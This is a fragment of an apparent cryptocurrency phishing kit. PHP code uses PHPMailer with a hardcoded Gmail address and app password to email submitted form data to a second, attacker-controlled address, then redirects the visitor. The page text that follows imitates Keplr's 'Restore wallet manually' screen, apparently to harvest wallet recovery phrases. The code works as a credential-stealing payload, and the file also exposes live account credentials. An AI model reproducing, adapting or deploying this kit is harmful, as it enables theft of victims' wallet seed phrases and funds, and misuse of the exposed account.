isSMTP(); $mail->Host = 'smtp.gmail.com'; // Add your SMTP server host $mail->SMTPAuth = true; $mail->Username = 'halparshmlv30@gmail.com'; // Add your SMTP username $mail->Password = 'hsfz cbuk zztk ssjj'; // Add your SMTP password $mail->SMTPSecure = 'tls'; // Use 'tls' or 'ssl' based on your server configuration $mail->Port = 587; // Adjust the port based on your server configuration // Recipients $mail->setFrom('halparshmlv30@gmail.com', 'Dub'); $mail->addAddress('anonymousunit02@gmail.com', 'Anony'); // Content $mail->isHTML(false); $mail->Subject = 'This is the subject of the email'; $mail->Body = "Name: $fullName\n"; // Send the email $mail->send(); header("Location: index.html"); } catch (Exception $e) { echo 'Error sending email: ', $mail->ErrorInfo; } } ?> Keplr | connect

Restore wallet manually

Keplr does not keep a copy of your recovery phrase